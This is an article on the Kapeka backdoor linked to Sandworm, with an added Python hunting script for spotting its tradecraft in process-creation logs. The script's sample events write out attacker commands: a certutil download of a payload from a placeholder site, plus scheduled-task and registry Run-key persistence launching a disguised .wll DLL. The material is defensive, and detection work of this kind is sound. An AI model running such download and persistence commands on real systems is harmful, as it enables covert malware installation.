A newly identified backdoor known as Kapeka has been linked to attacks on Eastern European targets, particularly in Estonia and Ukraine, since at least mid-2022. The backdoor is attributed with medium confidence to the Russian advanced persistent threat (APT) group Sandworm, also tracked as APT44 or Seashell Blizzard. Kapeka was documented by the Finnish cybersecurity firm WithSecure, which has observed it only sporadically across intrusions; Microsoft tracks the same malware under the name KnuckleTouch.
According to WithSecure researcher Mohammad Kazem Hassan Nejad, Kapeka is a flexible backdoor with the functionality needed to serve as an early-stage toolkit for its operators and to provide long-term access to a compromised estate. It is delivered by a dropper that installs and launches the backdoor component and then deletes itself from the host. Before removing itself, the dropper sets up persistence, choosing the method according to the privileges it runs with: a scheduled task when it is running as SYSTEM, otherwise an autorun entry in the registry.
Microsoft's advisory from February 2024 noted that the malware (as KnuckleTouch) was involved in multiple campaigns distributing ransomware, and that it can be used to steal credentials and other data, carry out destructive actions, and give the operators remote access to the device. The backdoor itself is a Windows dynamic-link library (DLL) written in C++ with an embedded command-and-control (C2) configuration. It talks to an attacker-controlled server over HTTP, exchanging commands and results as JSON.
Kapeka is disguised as a Microsoft Word add-in (the backdoor DLL carries a .wll extension) so that it blends in with legitimate Office software. Once running, it fingerprints the infected host and user and sends that information to the C2. The backdoor is multi-threaded, with separate threads to receive commands, execute tasks, and return results. Network communication goes through the WinHttp 5.1 COM interface, which it uses both to poll the C2 for new instructions and to forward task output.
The precise initial distribution method of Kapeka is still unknown, but Microsoft has observed the dropper being retrieved from compromised websites with the certutil utility, a signed Windows binary abused as a download tool. Abusing built-in, legitimately signed tools this way is known as living off the land, and the binaries involved as living-off-the-land binaries (LOLBins).
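As an added illustration of the tradecraft described above (certutil retrieval of the dropper, privilege-dependent persistence via a scheduled task or a registry Run key, and the Word add-in disguise), the following is a small hunting script run over constructed Sysmon-style process-creation events. It is example code written for this page, not WithSecure's or Microsoft's tooling. The hostnames, paths, task and value names, and the assumption that the .wll is launched through rundll32 with an ordinal export are made up for illustration; the ATT&CK IDs are the general techniques these behaviours fall under, not a published mapping for Kapeka.

```python
"""Hunt for Kapeka-style tradecraft in Windows process-creation telemetry.

Added example, not WithSecure's or Microsoft's code. It checks for:
  - certutil fetching a payload from a web server (Ingress Tool Transfer),
  - a scheduled task or a registry Run key pointing at a DLL that
    masquerades as a Word add-in (.wll), and
  - rundll32 loading such a DLL directly.
Field names follow Sysmon Event ID 1 (process create) JSON exports.
The task/value names, paths, and the rundll32 ",#1" launch are assumptions.
"""
import json
import re

# Constructed sample events (not real telemetry), one JSON object per line.
SAMPLE_LOG = r"""
{"EventID":1,"Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil.exe -urlcache -split -f http://compromised-site.invalid/files/update.bin C:\\Users\\Public\\update.bin","User":"CORP\\jdoe"}
{"EventID":1,"Image":"C:\\Windows\\System32\\schtasks.exe","CommandLine":"schtasks /create /sc onlogon /tn OfficeAddin /tr \"rundll32.exe C:\\ProgramData\\Microsoft\\OfficeAddin.wll,#1\" /ru SYSTEM /f","User":"NT AUTHORITY\\SYSTEM"}
{"EventID":1,"Image":"C:\\Windows\\System32\\reg.exe","CommandLine":"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v OfficeAddin /t REG_SZ /d \"rundll32.exe C:\\Users\\jdoe\\AppData\\Local\\OfficeAddin.wll,#1\" /f","User":"CORP\\jdoe"}
{"EventID":1,"Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil -hashfile C:\\tools\\setup.msi SHA256","User":"CORP\\admin"}
{"EventID":1,"Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"\"WINWORD.EXE\" /n \"C:\\Users\\jdoe\\Documents\\report.docx\"","User":"CORP\\jdoe"}
{"EventID":1,"Image":"C:\\Windows\\System32\\rundll32.exe","CommandLine":"rundll32.exe C:\\ProgramData\\Microsoft\\OfficeAddin.wll,#1","User":"NT AUTHORITY\\SYSTEM"}
"""

# certutil invoked with -urlcache, the switch used to fetch a remote file.
CERTUTIL_DOWNLOAD = re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b", re.IGNORECASE)
URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\b", re.IGNORECASE)
# A Windows path ending in .wll, the Word add-in extension the backdoor borrows.
WLL_PATH = re.compile(r'[A-Za-z]:\\[^\s"]+\.wll\b', re.IGNORECASE)


def parse_events(log_text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]


def detect(event):
    """Return a list of (technique_id, description) hits for one event."""
    cmd = event.get("CommandLine", "")
    user = event.get("User", "")
    hits = []

    if CERTUTIL_DOWNLOAD.search(cmd):
        url = URL.search(cmd)
        target = url.group(0) if url else "a remote file"
        hits.append(("T1105", f"certutil used to download {target}"))

    wll = WLL_PATH.search(cmd)
    if wll:
        path = wll.group(0)
        if SCHTASKS_CREATE.search(cmd):
            # The SYSTEM-privilege branch: persistence as a scheduled task.
            hits.append(("T1053.005", f"scheduled task runs Word add-in DLL {path} as {user}"))
        elif RUN_KEY.search(cmd):
            # The low-privilege branch: autorun via a registry Run key.
            hits.append(("T1547.001", f"Run-key autorun launches Word add-in DLL {path} for {user}"))
        elif "rundll32" in cmd.lower():
            hits.append(("T1218.011", f"rundll32 loading Word add-in DLL {path} outside Office"))
    return hits


def hunt(log_text):
    """Run detect() over every event; returns [(event_no, technique_id, description)]."""
    findings = []
    for event_no, event in enumerate(parse_events(log_text), start=1):
        for technique, description in detect(event):
            findings.append((event_no, technique, description))
    return findings


if __name__ == "__main__":
    for event_no, technique, description in hunt(SAMPLE_LOG):
        print(f"event {event_no}: {technique} {description}")
```

The two benign events (a certutil hash check and a normal WINWORD launch) produce no hits, which is the point of keying on `-urlcache` plus a URL and on the `.wll` extension rather than on the binary names alone. In a real environment, the same logic would be expressed as a SIEM query over the process-creation table, with the user field used to separate the SYSTEM scheduled-task variant from the per-user Run-key variant.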
The link to earlier Sandworm tooling rests on conceptual and technical overlaps with GreyEnergy, itself considered the successor to the BlackEnergy toolkit. WithSecure assesses that Kapeka was likely used in the intrusions that led to the deployment of Prestige ransomware in late 2022, and that it may be a newer addition to Sandworm's arsenal rather than a one-off tool.
Its sophistication, stealth, and sparse visibility in the wild are consistent with APT-level activity and, together with the victimology, point to Russian state involvement. For organisations in the affected regions the practical risk is persistent remote access to business and government systems, with the credential theft and destructive follow-on actions that Microsoft describes. In MITRE ATT&CK terms, the behaviour reported so far maps to Ingress Tool Transfer using certutil (T1105), Masquerading as a Word add-in (T1036), and persistence through a Scheduled Task (T1053.005) or Registry Run Keys (T1547.001), with command execution and data collection driven from the C2 over HTTP.
The recent emergence of Kapeka serves as a reminder for businesses to enhance their cybersecurity measures and remain vigilant against the evolving landscape of cyber threats.